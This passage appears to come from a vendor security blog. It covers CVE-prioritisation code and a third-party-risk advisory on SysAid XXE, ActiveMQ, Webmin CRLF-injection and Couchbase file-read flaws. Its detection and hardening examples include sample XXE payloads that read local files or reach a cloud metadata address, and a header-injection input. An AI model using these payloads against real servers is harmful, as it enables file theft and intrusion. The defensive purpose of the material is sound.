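    ("CVE-EXAMPLE-0005", "apache", "http_server", "2.4.62", date(2025, 1, 15), 6.5, True),   # recent and visible
    ("CVE-EXAMPLE-0006", "apache", "http_server", "2.4.30", date(2018, 3, 1), 5.0, True),    # already fixed in 2.4.49
    ("CVE-EXAMPLE-0007", "openbsd", "openssh", "9.8", date(2024, 7, 1), 8.1, True),          # different product
]


def version_key(v: str) -> Tuple[int, ...]:
    """'2.4.49' -> (2, 4, 49); '9.2p1' -> (9, 2, 1). Adequate for dotted versions."""
    return tuple(int(p) for p in re.findall(r"\d+", v))


def banner_to_cpe(banner: str) -> Optional[str]:
    """Extract product and version from a banner/header and build a CPE 2.3 name."""
    for vendor, product, pattern in BANNER_PATTERNS:
        m = pattern.search(banner)
        if m:
            return f"cpe:2.3:a:{vendor}:{product}:{m.group(1)}:*:*:*:*:*:*:*"
    return None  # no usable fingerprint: nothing to map (visibility is variable)


def match_cves(cpe: str):
    """Rows for the same vendor/product whose fix version is above the observed one."""
    _, _, _, vendor, product, version = cpe.split(":")[:6]
    observed = version_key(version)
    return [row for row in VULN_DB
            if row[1] == vendor and row[2] == product and observed < version_key(row[3])]


def filter_cves(rows, today: date, max_per_asset: int = 10, max_age_days: int = 730,
                high_impact_cvss: float = 9.0, min_cvss: float = 4.0) -> List[str]:
    kept = []
    for cve_id, _, _, _, published, cvss, osint in rows:
        if cvss < min_cvss:                             # exclude low severity
            continue
        recent = (today - published).days <= max_age_days
        if not recent and cvss < high_impact_cvss:      # old and not especially high-impact
            continue
        kept.append((osint, cvss, cve_id))
    kept.sort(key=lambda t: (t[0], t[1]), reverse=True)  # OSINT-discoverable first, then severity
    return [cve_id for _, _, cve_id in kept[:max_per_asset]]  # cap per asset


def assess(banner: str, today: date = AS_OF, max_per_asset: int = 10) -> List[str]:
    cpe = banner_to_cpe(banner)
    return filter_cves(match_cves(cpe), today, max_per_asset) if cpe else []
```

With the constructed table, the 2.4.49 banner maps to three of the six Apache rows: the old-but-critical one is kept, the old moderate one and the low-severity one are dropped, and the row whose fix predates the observed version never matches.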

2. FocusTags™ for High-Priority Threats

Some vulnerabilities warrant immediate action. For these, we created FocusTags™—a curated set of CVEs selected for their real-world risk based on exploitability, exposure, and threat actor interest.

For example, in 2024, more than 40,000 CVEs were published.

  • Around 1,000 passed our initial risk filters.
  • Of those, 780 were designated high-priority.
  • 295 received FocusTags based on their visibility in OSINT and likely impact.

These tags often overlap with known exploited vulnerabilities—many of which we flagged before public exploitation was confirmed. In certain cases, we used advanced techniques like TLS certificate analysis or favicon hash matching to surface assets that don’t respond to traditional scanning methods.

A note: Black Kite is not a vulnerability scanner. We do not perform authenticated internal scans. Instead, we use OSINT to identify whether systems appear susceptible to known vulnerabilities. Our goal is to measure risk exposure—not confirm exploit paths or patch status.

Rethink Third-Party Vulnerability Management with Black Kite

Yes, the threat landscape is growing more complex. But so are the tools we have to manage it.

We no longer need to chase every vulnerability across every vendor. With the right intelligence, we can take a more targeted, more effective approach. That means better prioritization, smarter remediation, and stronger overall cyber resilience.

Want to see what that looks like in practice? Read our full 2025 Supply Chain Vulnerability Report.


Dr. Ferhat Dikbiyik is the Chief Research & Intelligence Officer at Black Kite, where he leads BRITE, the team behind third-party risk intelligence, ransomware trend analysis, and the tools helping organizations stay three steps ahead of their next threat.





Focus Friday: TPRM Insights Into SysAid, ActiveMQ, Webmin, and Couchbase Server Vulnerabilities

9 May 2025 at 09:04

Written by: Ferdi Gül

This week’s Focus Friday highlights four high-priority vulnerabilities affecting widely used enterprise technologies: SysAid On-Premises, Apache ActiveMQ, Webmin, and Couchbase Server. Each of these products serves a critical function—whether facilitating IT service management, message brokering, system administration, or database operations. Their importance makes them prime targets for exploitation, and this week’s disclosures demonstrate both the breadth and depth of third-party risks facing modern enterprises.

From pre-authentication remote code execution in SysAid to denial-of-service vulnerabilities in ActiveMQ, privilege escalation flaws in Webmin, and file disclosure issues in Couchbase, the potential for vendor-side compromise is substantial. This week’s blog dissects these incidents through a Third-Party Risk Management (TPRM) lens and explains how Black Kite’s FocusTags™ empower organizations to swiftly identify which vendors are truly at risk and prioritize outreach accordingly.

Filtered view of companies with SysAid On-Premises FocusTag™ on the Black Kite platform.

CVE-2025-2775, CVE-2025-2776, CVE-2025-2777 – SysAid On-Premises XXE Injection Vulnerabilities

What are the SysAid On-Premises Pre-Auth XXE Vulnerabilities?

In March 2025, multiple critical pre-authentication XML External Entity (XXE) injection vulnerabilities were disclosed in SysAid On-Premises, a widely used IT Service Management (ITSM) solution. These flaws—CVE-2025-2775, CVE-2025-2776, and CVE-2025-2777—impact the /mdm/checkin, /mdm/serverurl, and /lshw endpoints respectively. Improper XML parsing in these components allows attackers to inject external entities, enabling unauthenticated access to sensitive local files or performing Server-Side Request Forgery (SSRF).

The vulnerabilities are classified as Critical, each carrying a CVSS score of 9.3, although these scores were not officially published at the time of writing. A working Proof-of-Concept (PoC) exploit is publicly available. While these CVEs are not yet listed in CISA’s Known Exploited Vulnerabilities (KEV), historical precedence—such as the exploitation of CVE-2023-47246 by the Cl0p ransomware group—suggests high likelihood of active weaponization.

All three vulnerabilities are patched in SysAid On-Premises version 24.4.60 b16, released in March 2025. Earlier versions remain susceptible, including v23.3.40, the version confirmed to be vulnerable by researchers.

Why Should TPRM Professionals Be Concerned About These SysAid Vulnerabilities?

SysAid On-Premises is more than just helpdesk software: it is a business-critical ITSM platform that is frequently exposed to the internet. It manages internal tickets, configuration data, asset inventories, and privileged workflows across an enterprise, so a compromise can cascade into multiple internal systems.

The pre-authentication nature of these vulnerabilities significantly lowers the exploitation barrier, especially since one of the attack paths exposes the plaintext administrator password stored in the InitAccount.cmd file. With that credential, attackers gain privileged access to the SysAid environment, and in known exploit chains, this leads to Remote Command Execution (RCE) via a separate post-auth command injection vector.

Vendors using SysAid On-Premises are at elevated risk of compromise through:

  • Data theft from internal ticketing systems
  • Hijacking of asset and configuration repositories
  • Leveraging helpdesk channels for internal spear-phishing
  • Deployment of ransomware through administrative access

These risks multiply when threat actors use the platform as a pivot to access more sensitive parts of a vendor’s network.

What Questions Should TPRM Professionals Ask Vendors About These SysAid Vulnerabilities?

Organizations managing third-party risk should direct the following questions to vendors potentially using SysAid On-Premises:

  1. Have you updated all instances of SysAid On-Premises to version 24.4.60 b16 or later to mitigate the risk of CVE-2025-2775, CVE-2025-2776, and CVE-2025-2777?
  2. Can you confirm that all external access points to SysAid endpoints (/mdm/checkin, /mdm/serverurl, /lshw) have been appropriately secured or restricted from unauthorized external connections to prevent XML External Entity (XXE) injection and Server-Side Request Forgery (SSRF)?
  3. Have you implemented monitoring measures to detect suspicious or malicious requests targeting the SysAid endpoints (/mdm/checkin, /mdm/serverurl, /lshw) that were previously vulnerable to XXE injection and SSRF?
  4. Have you reviewed and updated your incident response procedures to ensure rapid identification and remediation capabilities for XXE-based vulnerabilities, specifically those identified in CVE-2025-2775, CVE-2025-2776, and CVE-2025-2777?

Remediation Recommendations for Vendors Subject to This Risk

Vendors should take the following remediation steps to mitigate these vulnerabilities:

  • Upgrade Immediately to SysAid On-Premises version 24.4.60 b16 or later.
  • Restrict or firewall external access to /mdm/checkin, /mdm/serverurl, and /lshw endpoints to limit exposure.
  • Audit the file system for the presence of InitAccount.cmd or other artifacts containing plaintext credentials and securely delete them.
  • Continuously monitor logs for anomalous or suspicious activity directed at the vulnerable endpoints.
  • Implement server-side XML parsing hardening practices across all Java-based services to prevent future XXE flaws.
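The monitoring step above is concrete enough to write down. The following is an added example, not SysAid’s or Black Kite’s code: it assumes a reverse proxy or WAF in front of SysAid that logs request bodies, and scans requests to the three endpoints named above for generic XXE and SSRF markers (DOCTYPE declarations, external entities, parameter entities, file:// URIs, entity URLs pointing at internal addresses). The indicators are generic XXE patterns, not a SysAid-specific payload, and the sample requests are constructed.

```python
"""Flag XXE / SSRF indicators in requests to the SysAid endpoints named above.

Added example, not SysAid's or Black Kite's code. Assumes a proxy/WAF that
logs request bodies; indicators are generic XXE markers, sample requests
are constructed.
"""
import re
from typing import Dict, List

WATCHED_PATHS = {"/mdm/checkin", "/mdm/serverurl", "/lshw"}

# (name, regex over the request body). Generic XXE/SSRF markers only.
RULES = [
    ("doctype_declaration", re.compile(r"<!DOCTYPE\b", re.I)),
    ("external_entity", re.compile(r"<!ENTITY\s+%?\s*\w+\s+(?:SYSTEM|PUBLIC)\b", re.I)),
    ("parameter_entity_use", re.compile(r"%\w+;")),
    ("file_uri", re.compile(r"\bfile:///", re.I)),
    ("internal_url", re.compile(
        r'(?:SYSTEM|PUBLIC)\s+"(?:https?|ftp|jar|gopher)://'
        r'(?:127\.|10\.|192\.168\.|172\.(?:1[6-9]|2\d|3[01])\.|169\.254\.|localhost)', re.I)),
]
HIGH = {"external_entity", "file_uri", "internal_url"}


def detect_xxe(requests: List[Dict[str, str]]) -> List[Dict[str, object]]:
    """Return one alert per suspicious request to a watched endpoint."""
    alerts = []
    for i, req in enumerate(requests):
        path = req["path"].split("?")[0].rstrip("/") or "/"
        if path not in WATCHED_PATHS:
            continue  # design choice: only the endpoints the advisory names
        hits = [name for name, rx in RULES if rx.search(req.get("body", ""))]
        if not hits:
            continue
        alerts.append({
            "index": i,
            "src": req["src"],
            "path": path,
            # Any external entity, file URI or internal URL is a real attempt;
            # a bare DOCTYPE is unusual for an MDM client but could be noise.
            "severity": "high" if HIGH & set(hits) else "medium",
            "indicators": hits,
        })
    return alerts


# Constructed sample requests (not real SysAid traffic; addresses are documentation ranges).
SAMPLE_REQUESTS = [
    {"src": "10.20.30.40", "path": "/mdm/checkin",
     "body": '<?xml version="1.0"?><checkin><udid>ABC123</udid></checkin>'},
    {"src": "203.0.113.7", "path": "/mdm/checkin",
     "body": '<?xml version="1.0"?><!DOCTYPE x [<!ENTITY xxe SYSTEM "file:///etc/hostname">]>'
             '<checkin>&xxe;</checkin>'},
    {"src": "203.0.113.7", "path": "/lshw/",
     "body": '<!DOCTYPE x [<!ENTITY % p SYSTEM "http://169.254.169.254/latest/">%p;]><lshw/>'},
    {"src": "198.51.100.9", "path": "/login",
     "body": "<!DOCTYPE html><html></html>"},
    {"src": "10.20.30.41", "path": "/mdm/serverurl",
     "body": "<!DOCTYPE url><url>https://sysaid.example.internal</url>"},
]

if __name__ == "__main__":
    for alert in detect_xxe(SAMPLE_REQUESTS):
        print(alert["severity"].upper(), alert["src"], alert["path"], ",".join(alert["indicators"]))
```

Two of the constructed requests are flagged high (a file:// entity and a parameter entity pointing at a link-local address), one is flagged medium for an unexplained DOCTYPE, and the /login request is ignored even though it carries a DOCTYPE, because it is not one of the watched endpoints.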

How TPRM Professionals Can Leverage Black Kite for This Vulnerability

Black Kite published the SysAid On-Premises [Suspected] FocusTag™ on May 7, 2025, identifying vendors potentially exposed to CVE-2025-2775, CVE-2025-2776, and CVE-2025-2777. The FocusTag enables third-party risk managers to zero in on vendors that are running vulnerable assets, significantly reducing the time required to triage broad vulnerabilities.

The tag includes:

  • Asset-level attribution such as IP addresses and subdomains hosting vulnerable versions
  • Vendor-specific insights into deployment confidence levels (Medium in this case)
  • References to public exploit code and vulnerability details

This tag empowers TPRM professionals to focus only on vendors truly at risk, minimizing redundant outreach and enabling faster remediation.

Black Kite’s SysAid On-Premises FocusTag™ details critical insights on the event for TPRM professionals.

CVE-2025-27533 in Apache ActiveMQ

What is CVE-2025-27533 in Apache ActiveMQ?

CVE-2025-27533 is a medium-severity vulnerability identified in Apache ActiveMQ, a widely used open-source message broker. The flaw arises from improper validation of buffer sizes during the unmarshalling of OpenWire commands. An attacker can exploit this vulnerability by sending specially crafted OpenWire packets that trigger excessive memory allocation, leading to memory exhaustion and potential denial-of-service (DoS) attacks.

Exploit Conditions for CVE-2025-27533

An attacker can exploit this vulnerability only if all of the following are true:

  1. OpenWire Protocol Is Reachable
    • The flaw is triggered during the unmarshalling of OpenWire commands.
    • The attacker must be able to send data over OpenWire (the protocol clients use to communicate with the ActiveMQ broker).
  2. Mutual TLS (mTLS) Is Disabled
    • mTLS prevents unauthorized clients from connecting to the broker.
    • When mTLS is turned off (the default setting), attackers can readily establish sessions and deliver malicious OpenWire messages.
  3. Authentication Is Not Enforced
    • Without mTLS, any peer that can reach the port gets a session. The broker only learns who the client is from the credentials in its ConnectionInfo command, and that command has to be unmarshalled before it can be checked.
    • A crafted frame sent before (or instead of) ConnectionInfo is therefore processed on behalf of an unauthenticated, remote attacker. This is why credential checks alone do not close the gap and why mutual TLS, which rejects an untrusted client during the handshake, is the mitigation Apache recommends.

Although no PoC exploit code is currently available for CVE-2025-27533 and it remains tracked under Apache issue AMQ-6596 without inclusion in CISA’s KEV catalog, its potential for unauthenticated memory-exhaustion attacks against critical messaging brokers poses a serious reliability and availability risk in enterprise environments.
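The three conditions above map directly onto the broker’s configuration. The following activemq.xml excerpt is an added example, not from the page or from the Apache ActiveMQ project documentation: it shows the exposed default (plain OpenWire on every interface) beside a hardened connector that binds to an internal address and requires a client certificate. The bind address, keystore paths and passwords are placeholders; child elements of `<broker>` are kept in alphabetical order, which the ActiveMQ schema expects.

```xml
<!-- activemq.xml excerpt: added example, not from the page or the Apache ActiveMQ project -->
<broker xmlns="http://activemq.apache.org/schema/core" brokerName="broker">

  <!-- Exposed: plain OpenWire on every interface, no client certificate and no
       credential check. Any host that can reach TCP/61616 can deliver crafted
       OpenWire frames (conditions 1, 2 and 3 above). Left here commented out. -->
  <!--
  <transportConnectors>
    <transportConnector name="openwire" uri="tcp://0.0.0.0:61616"/>
  </transportConnectors>
  -->

  <!-- Credential authentication is still worth enabling for everything that
       happens after the TLS handshake, but it is not what blocks this DoS. -->
  <plugins>
    <jaasAuthenticationPlugin configuration="activemq"/>
  </plugins>

  <!-- Broker key pair plus a trust store holding only the CA that signs client
       certificates. Paths and passwords are placeholders. -->
  <sslContext>
    <sslContext keyStore="file:${activemq.conf}/broker.ks" keyStorePassword="CHANGE_ME"
                trustStore="file:${activemq.conf}/client-ca.ts" trustStorePassword="CHANGE_ME"/>
  </sslContext>

  <transportConnectors>
    <!-- Hardened: TLS listener bound to an internal address (placeholder);
         needClientAuth=true rejects any peer without a trusted client
         certificate during the handshake, before any OpenWire data is read. -->
    <transportConnector name="openwire-mtls"
        uri="ssl://10.0.0.5:61617?needClientAuth=true&amp;transport.enabledProtocols=TLSv1.2,TLSv1.3"/>
  </transportConnectors>
</broker>
```

Binding to an internal address and restricting the port at the network layer (the fourth question in the list that follows) complements this: mTLS protects the brokers that cannot be upgraded yet, and the firewall limits who can even attempt a handshake.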

Why Should TPRM Professionals Care About CVE-2025-27533?

Apache ActiveMQ serves as a critical component in many enterprise environments, facilitating communication between different applications and systems. A DoS attack exploiting this vulnerability could disrupt business operations, leading to service outages and potential data loss. Furthermore, if mutual TLS (mTLS) is not enabled, attackers can exploit this vulnerability remotely without authentication, increasing the risk of widespread impact.

What questions should TPRM professionals ask vendors about CVE-2025-27533?

  1. Have you updated all instances of Apache ActiveMQ to the patched versions (6.1.6 or later, 5.19.0 or later, 5.18.7 or later, 5.17.7 or later, 5.16.8 or later) to mitigate the risk of CVE-2025-27533?
  2. Can you confirm if you have implemented Mutual TLS (mTLS) on your Apache ActiveMQ to prevent unauthorized clients from establishing connections to the broker and potentially exploiting CVE-2025-27533?
  3. Have you set up automated monitoring and alerting for sudden spikes in memory usage or broker performance degradation, which may signal exploitation attempts of CVE-2025-27533?
  4. Have you restricted network access to ActiveMQ broker ports—especially OpenWire (typically TCP port 61616)—to only trusted IP ranges or internal systems to mitigate the risk of CVE-2025-27533?

Remediation Recommendations for Vendors Subject to This Risk

  • Upgrade Immediately: Update Apache ActiveMQ to one of the patched versions: 6.1.6 or later, 5.19.0 or later, 5.18.7 or later, 5.17.7 or later, 5.16.8 or later.
  • Implement Mutual TLS: For affected brokers that cannot yet be upgraded, enforce mutual TLS (mTLS) to mitigate unauthenticated remote access.
  • Restrict Network Access: Limit access to ActiveMQ broker ports—especially OpenWire (typically TCP port 61616)—to only trusted IP ranges or internal systems.
  • Monitor Resource Usage: Set up automated monitoring and alerting for sudden spikes in memory usage or broker performance degradation.
  • Inspect Logs and Network Traffic: Review ActiveMQ logs and network traffic for anomalies or malformed OpenWire command activity.
  • Test Application Compatibility: After upgrading, validate that internal applications depending on ActiveMQ still function as expected.
  • Use Web Application Firewalls (WAF) or Proxies: If possible, front ActiveMQ brokers with reverse proxies or WAFs that can enforce additional traffic validation and rate-limiting.
  • Develop an Incident Response Plan: Prepare your IR team to respond to a broker-level DoS scenario by including procedures for isolating affected brokers, restarting services, and rerouting messaging workloads if necessary.
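The three exploit conditions and the remediation items above can be checked mechanically. The following Python script is an added example, not Black Kite’s or the ActiveMQ project’s code: it audits the transportConnector entries of an activemq.xml for OpenWire listeners that are plain TCP or TLS without transport.needClientAuth=true, notes whether each binds to loopback, and compares a broker version against the patched releases listed above. The XML is constructed for the example; the assumption that tcp/nio/auto connectors carry OpenWire follows the ActiveMQ transport documentation.

```python
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit, parse_qs

# Assumption (per ActiveMQ transport docs): tcp-family transports default to the
# OpenWire wire format; amqp/mqtt/stomp/ws connectors do not carry OpenWire.
OPENWIRE_PLAIN = {"tcp", "nio", "auto", "auto+nio"}
OPENWIRE_TLS = {"ssl", "nio+ssl", "auto+ssl", "auto+nio+ssl"}
LOOPBACK = {"127.0.0.1", "localhost", "::1"}

# Patched releases named in the advisory text: 6.1.6+, 5.19.0+, 5.18.7+, 5.17.7+, 5.16.8+.
# 5.x branches not listed here (e.g. 5.15) have no fixed release.
FIXED_5X_PATCH = {16: 8, 17: 7, 18: 7}


def parse_version(text):
    """'5.18.3' -> (5, 18, 3); a suffix such as '-SNAPSHOT' is ignored."""
    parts = [int(p) for p in text.split("-")[0].split(".")[:3]]
    return tuple(parts + [0] * (3 - len(parts)))


def is_patched(version):
    """True when the version is at or beyond a fixed release for its branch."""
    v = parse_version(version)
    major, minor = v[0], v[1]
    if major >= 7:                    # assumption: later majors carry the fix
        return True
    if major == 6:
        return v >= (6, 1, 6)
    if major == 5:
        if minor >= 19:               # "5.19.0 or later"
            return True
        fixed_patch = FIXED_5X_PATCH.get(minor)
        return fixed_patch is not None and v >= (5, minor, fixed_patch)
    return False


def audit_connectors(xml_text):
    """Return (connector name, finding) pairs for every OpenWire-capable connector
    that can satisfy the exploit conditions: reachable and without mutual TLS."""
    findings = []
    for el in ET.fromstring(xml_text).iter():
        if el.tag.rsplit("}", 1)[-1] != "transportConnector":   # strip XML namespace
            continue
        name, uri = el.get("name", "?"), el.get("uri", "")
        parts = urlsplit(uri)
        scheme = parts.scheme.lower()
        exposure = "loopback-only" if (parts.hostname or "") in LOOPBACK else "network-reachable"
        if scheme in OPENWIRE_PLAIN:
            findings.append((name, f"plain OpenWire ({exposure}); no TLS, so mTLS cannot be enforced"))
        elif scheme in OPENWIRE_TLS:
            opts = parse_qs(parts.query)
            need = (opts.get("transport.needClientAuth") or opts.get("needClientAuth") or ["false"])[0]
            if need.lower() != "true":
                findings.append((name, f"OpenWire over TLS ({exposure}) without needClientAuth=true; "
                                       "clients are not authenticated by certificate"))
    return findings


# Constructed activemq.xml fragment for the example (not a real deployment).
SAMPLE_ACTIVEMQ_XML = """\
<beans xmlns="http://www.springframework.org/schema/beans">
  <broker xmlns="http://activemq.apache.org/schema/core" brokerName="demo">
    <transportConnectors>
      <transportConnector name="openwire" uri="tcp://0.0.0.0:61616?maximumConnections=1000"/>
      <transportConnector name="openwire-ssl" uri="ssl://0.0.0.0:61617?transport.needClientAuth=true"/>
      <transportConnector name="ssl-noauth" uri="nio+ssl://0.0.0.0:61619"/>
      <transportConnector name="amqp" uri="amqp://0.0.0.0:5672"/>
      <transportConnector name="internal" uri="tcp://127.0.0.1:61618"/>
    </transportConnectors>
  </broker>
</beans>
"""


def summarize(version, xml_text):
    """Combine the version check with the connector audit into one report."""
    return {"version": version, "patched": is_patched(version),
            "connector_findings": audit_connectors(xml_text)}


if __name__ == "__main__":
    report = summarize("5.18.3", SAMPLE_ACTIVEMQ_XML)
    print(f"ActiveMQ {report['version']} patched: {report['patched']}")
    for name, finding in report["connector_findings"]:
        print(f"  {name}: {finding}")
```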

How TPRM Professionals Can Leverage Black Kite for This Vulnerability

Black Kite provides continuous monitoring and risk assessment capabilities that can help TPRM professionals identify and manage vulnerabilities like CVE-2025-27533. By leveraging Black Kite’s platform, organizations can:

  • Detect the presence of vulnerable Apache ActiveMQ instances within their vendor ecosystem.
  • Assess the potential impact of CVE-2025-27533 on their supply chain.
  • Receive timely alerts and recommendations for remediation actions.

Black Kite’s FocusTag™ for Apache ActiveMQ – May2025, published on May 8, 2025, offers detailed insights into this vulnerability, including affected versions, mitigation strategies, and monitoring recommendations. TPRM professionals can use this information to engage with vendors, ensure timely patching, and enhance their overall risk management posture.

Black Kite’s Apache ActiveMQ – May2025 FocusTag™ details critical insights on the event for TPRM professionals.

CVE-2025-2774 – Webmin CRLF Injection Privilege Escalation Vulnerability

What is the Webmin CRLF Injection Privilege Escalation Vulnerability?

CVE-2025-2774 is a critical CRLF (Carriage Return Line Feed) injection vulnerability affecting Webmin versions prior to 2.302. This flaw arises from improper neutralization of CRLF sequences in CGI request handling, allowing authenticated attackers to manipulate HTTP headers and execute arbitrary code with root privileges. The vulnerability has a CVSS score of 8.8 (high severity), while its estimated exploit probability is currently low.

Discovered and reported to the vendor on February 28, 2025, the vulnerability was publicly disclosed on May 1, 2025. As of now, there is no evidence of exploitation in the wild, and it has not been added to CISA’s Known Exploited Vulnerabilities catalog.
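The neutralization failure described above is easiest to see with the “before” and hardened forms of a header-building routine side by side. The Python below is an added example and not Webmin’s code: it shows a CRLF sequence in a user-controlled value splitting one header into two, and a hardened builder that rejects CR, LF and NUL instead of emitting them. The header names and the tainted value are constructed for the example.

```python
import re

# Octets that must never appear inside an HTTP header name or value. A CR or LF
# ends the header line, so an unneutralized one lets whoever controls the value
# append further headers (CWE-93, the bug class behind CVE-2025-2774).
FORBIDDEN = re.compile(r"[\r\n\x00]")


class HeaderInjection(ValueError):
    """Raised by the hardened builder when a CR, LF or NUL is present."""


def build_response_vulnerable(status_line, headers):
    """'Before' form: names and values go into the header block unchanged."""
    lines = [status_line] + [f"{name}: {value}" for name, value in headers.items()]
    return "\r\n".join(lines) + "\r\n\r\n"


def build_response_hardened(status_line, headers):
    """Hardened form: reject any name or value containing CR, LF or NUL rather
    than trying to strip it, so the block holds only the headers the caller chose."""
    for name, value in headers.items():
        if FORBIDDEN.search(str(name)) or FORBIDDEN.search(str(value)):
            raise HeaderInjection(f"control character in header {name!r}")
    return build_response_vulnerable(status_line, headers)


def parse_header_block(raw):
    """Parse a header block the way a client does: the first blank line ends it."""
    head, _, body = raw.partition("\r\n\r\n")
    status_line, *header_lines = head.split("\r\n")
    parsed = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        parsed[name.strip()] = value.strip()
    return status_line, parsed, body


# Constructed input: a language code as a CGI might echo it into Content-Language,
# with a CRLF sequence smuggled in after the legitimate value.
TAINTED_LANG = "en\r\nX-Injected: 1"


def demo():
    """Return (headers a client sees from the vulnerable builder, whether the
    hardened builder rejected the same input)."""
    _, seen, _ = parse_header_block(
        build_response_vulnerable("HTTP/1.1 200 OK", {"Content-Language": TAINTED_LANG}))
    try:
        build_response_hardened("HTTP/1.1 200 OK", {"Content-Language": TAINTED_LANG})
        rejected = False
    except HeaderInjection:
        rejected = True
    return seen, rejected


if __name__ == "__main__":
    headers, rejected = demo()
    print("vulnerable builder emitted:", headers)   # an extra X-Injected header appears
    print("hardened builder rejected input:", rejected)
```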

Why Should TPRM Professionals Be Concerned About This Vulnerability?

Webmin is a widely used web-based system administration tool for Unix-like servers, with over a million installations worldwide. A successful exploit of CVE-2025-2774 could grant attackers root-level access, allowing them to:

  • Modify or disrupt critical server configurations
  • Access, modify, or exfiltrate sensitive data
  • Deploy malware or establish persistent unauthorized access
  • Disrupt services and operations

Given Webmin’s role in managing critical server functions, this vulnerability poses significant risks to organizations relying on it for system administration.

What Questions Should TPRM Professionals Ask Vendors Regarding CVE-2025-2774?

  1. Can you confirm if you have updated all your Webmin installations to version 2.302 or later to mitigate the risk of the CRLF Injection Privilege Escalation Vulnerability (CVE-2025-2774)?
  2. Have you implemented robust access controls and limited user permissions to prevent low-privilege Webmin accounts from exploiting this vulnerability?
  3. Are you actively reviewing your server and Webmin logs for signs of unusual or suspicious activities, particularly around CGI request handling, as a measure to detect potential exploitation of CVE-2025-2774?
  4. Have you ensured that your incident response plans include scenarios involving privilege escalation and immediate steps for isolation, investigation, and remediation in the event of a successful exploitation of the CRLF Injection Privilege Escalation Vulnerability (CVE-2025-2774)?

Remediation Recommendations for Vendors Subject to This Risk

  • Immediately update Webmin installations to version 2.302 or later.
  • Restrict Webmin access to trusted networks and enforce strong authentication practices.
  • Review server and Webmin logs diligently for signs of unusual or suspicious activities.
  • Implement and maintain robust access controls, following the principle of least privilege.

How TPRM Professionals Can Leverage Black Kite for This Vulnerability

Black Kite published the FocusTag for CVE-2025-2774 on May 7, 2025. TPRM professionals can utilize Black Kite’s platform to identify vendors potentially affected by this vulnerability. The platform provides asset information, such as IP addresses and subdomains, associated with the vendors’ systems, enabling organizations to assess and manage third-party risks effectively.

Black Kite’s Webmin FocusTag™ details critical insights on the event for TPRM professionals.

CVE-2025-46619 – Couchbase Server Local File Inclusion Vulnerability

What is the Couchbase Server Local File Inclusion Vulnerability?

CVE-2025-46619 is a high-severity Local File Inclusion (LFI) vulnerability identified in Couchbase Server versions prior to 7.6.4 (all platforms) and 7.2.7 (Windows builds). Affected versions are 7.6.3, 7.6.2, 7.6.1, 7.6.0, 7.2.6, 7.2.5, 7.2.4, 7.2.3, 7.2.2, 7.2.1, 7.2.0, 7.1.x, 7.0.x, 6.x, 5.x, 4.x, 3.x, 2.x.

This flaw allows unauthorized users to read sensitive system files, such as /etc/passwd or /etc/shadow. It arises from improper access controls that let an attacker read arbitrary files on the server.

The vulnerability was publicly disclosed on April 30, 2025. As of now, there is no evidence of exploitation in the wild, and it has not been added to CISA’s Known Exploited Vulnerabilities catalog. The vulnerability’s CVSS score of 7.6 is currently classified as High.

Why Should TPRM Professionals Be Concerned About This Vulnerability?

Couchbase Server is a widely-used NoSQL document database, integral to many enterprise applications. Exploitation of CVE-2025-46619 could allow attackers to access sensitive configuration files, leading to potential data breaches or system compromises. Given the prevalence of Couchbase in critical systems, this vulnerability poses a significant risk to organizations relying on it for data management.

What Questions Should TPRM Professionals Ask Vendors Regarding CVE-2025-46619?

  1. Have you upgraded all instances of Couchbase Server to version 7.6.4 (cross-platform) or 7.2.7 (Windows) to mitigate the risk of CVE-2025-46619?
  2. Can you confirm that you have implemented monitoring and auditing measures to detect unusual file-read attempts, specifically related to potential exploitation of the Local File Inclusion (LFI) vulnerability in Couchbase Server?
  3. Have you conducted an internal verification to inventory all Windows deployments of Couchbase Server and confirmed they are running versions 7.2.7 or higher?
  4. Have you reviewed and adjusted the configuration of any web-facing interfaces to ensure they do not expose arbitrary file paths, as recommended in the remediation measures for CVE-2025-46619?

Remediation Recommendations for Vendors Subject to This Risk

  • Immediately upgrade Couchbase Server to version 7.6.4 or 7.2.7 (for Windows) to remediate the LFI vulnerability.
  • Restrict database process permissions to prevent unauthorized file reads.
  • Ensure that any web-facing interfaces do not expose arbitrary file paths.
  • Monitor access logs for unusual file-read attempts and conduct regular vulnerability scans.

How TPRM Professionals Can Leverage Black Kite for This Vulnerability

Black Kite published the FocusTag™ for CVE-2025-46619 on May 6, 2025. TPRM professionals can utilize Black Kite’s platform to identify vendors potentially affected by this vulnerability. The platform provides asset information, such as IP addresses and subdomains, associated with the vendors’ systems, enabling organizations to assess and manage third-party risks effectively.

Black Kite’s Couchbase Server FocusTag™ details critical insights on the event for TPRM professionals.

Enhancing Vendor Risk Management with Black Kite’s FocusTags™

In an era where threat actors rapidly pivot to exploit newly disclosed vulnerabilities, organizations need fast, intelligent ways to assess third-party exposure. That’s where Black Kite’s FocusTags™ come into play—especially for critical flaws like those found in SysAid, Apache ActiveMQ, Webmin, and Couchbase Server.

Here’s how Black Kite’s FocusTags™ amplify TPRM efficiency and precision:

  • Vendor-Specific Risk Identification: By tagging vendors with confirmed or suspected exposure to these vulnerabilities, FocusTags™ eliminate guesswork and reduce the number of vendors that require immediate attention.
  • Asset-Level Context: Beyond just naming the vendor, FocusTags™ provide concrete intelligence—such as IP addresses or subdomains hosting vulnerable systems—making the risk truly actionable.
  • Prioritized Outreach: Knowing which vendors are affected, and how, enables TPRM teams to send targeted, informed questionnaires rather than blanket inquiries that burden vendors and slow down triage.
  • Holistic Threat Context: FocusTags™ incorporate exploitation status, CISA KEV presence, patch availability, and severity scoring, giving teams a full-spectrum view of risk.

With Black Kite’s FocusTags™, your organization is empowered to act swiftly and precisely—not just to understand where exposure exists, but to take meaningful, time-sensitive steps to reduce risk in a constantly evolving threat landscape.

About Focus Friday

Every week, we delve into the realms of critical vulnerabilities and their implications from a Third-Party Risk Management (TPRM) perspective. This series is dedicated to shedding light on pressing cybersecurity threats, offering in-depth analyses, and providing actionable insights.

FocusTags™ in the Last 30 Days:

  • SysAid On-Premises: CVE-2025-2775, CVE-2025-2776, CVE-2025-2777, XML External Entity (XXE) Injection Vulnerability in SysAid On-Premises.
  • Apache ActiveMQ – May2025: CVE-2025-27533, Memory Allocation with Excessive Size Value in Apache ActiveMQ.
  • Webmin: CVE-2025-2774, CRLF Injection Privilege Escalation Vulnerability in Webmin.
  • Couchbase Server: CVE-2025-46619, LFI Vulnerability in Couchbase Server.
  • SAP NetWeaver VCFRAMEWORK: CVE-2025-31324, Remote Code Execution Vulnerability in SAP NetWeaver Visual Composer’s Metadata Uploader component.
